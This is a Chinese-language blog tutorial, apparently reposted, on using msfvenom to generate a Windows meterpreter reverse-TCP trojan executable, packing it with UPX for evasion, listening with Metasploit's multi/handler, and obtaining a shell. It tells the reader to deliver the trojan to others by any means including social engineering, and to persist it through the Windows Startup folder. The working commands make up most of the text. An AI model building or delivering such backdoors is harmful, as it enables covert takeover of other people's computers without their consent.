天天看點

Msfvenonm生成後門

之前一篇文章通過以永恒之藍漏洞為切入點詳細的講解了 Meterpreter 的用法.今天我要講的是我們用Msfvenom制作一個木馬,發送給其他主機,隻要其他主機運作了該木馬,就會自動連接配接到我們的主機,并且建立一條TCP連接配接。我們可以通過這條TCP連接配接控制目标主機。

Msfvenom

  • –p (- -payload-options):添加載荷payload。載荷這個東西比較多,這個軟體就是根據對應的載荷payload生成對應平台下的後門,是以隻有選對payload,再填寫正确自己的IP,PORT,就可以生成對應語言,對應平台的後門了!!!
  •     –l:檢視所有payload encoder nops。
  •     –f :輸出檔案格式。
  •     –e:編碼免殺。
  •     –a:選擇架構平台  x86 | x64 | x86_64
  •     –o:檔案輸出
  •     –s:生成payload的最大長度,就是檔案大小。
  •     –b:避免使用的字元 例如:不使用 ‘\0f’。
  •     –i:編碼次數。
  •     –c:添加自己的shellcode
  •     –x | -k:捆綁

檢視 msfvenom

Msfvenonm生成後門

生成exe木馬

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.226 lport=8888 -f exe -o test.exe

    #lhost是我們的主機ip,lport是我們主機的用于監聽的端口

Msfvenonm生成後門

然後在 root目錄下生成了一個test.exe 檔案

利用 upx 加殼

upx -9 test.exe -k -o test2.exe
           
Msfvenonm生成後門

 接下來,我們運作 msfconsole 進入MSF控制台,然後輸入以下指令

msf > use exploit/multi/handler  #使用exploit/multi/handler監聽從殭屍電腦發來的資料

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  #設定payload,不同的木馬設定不同的payload

           

檢視配置資訊

show options

Msfvenonm生成後門

設定本地接收位址及端口

Msfvenonm生成後門

run開始監聽

Msfvenonm生成後門

然後,我們把木馬發送給别人(無論你使用什麼手段,比如社會工程學)讓其在其他主機上運作,我們這邊檢測到木馬被運作了這邊就會接收到反彈過來的session。比如下面,木馬在靶機上運作,這邊馬上就接收到了

Msfvenonm生成後門

輸入  shell  進入主機

Msfvenonm生成後門

成功進入目标主機

對于這個木馬,如果我們在擷取到某主機的shell後,想要在目标主機建立持續性的後門,我們可以将該木馬放到目标主機的開機啟動項中(如何遠端加入到啟動項中?),那樣,隻要該主機啟動後,我們就可以連接配接到該主機了

C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
           

但是,雖然目标主機運作了該木馬程式,但是由于種種原因,還是有可能擷取不到對方的session。

refer to :https://blog.csdn.net/qq_36119192/article/details/83869141

繼續閱讀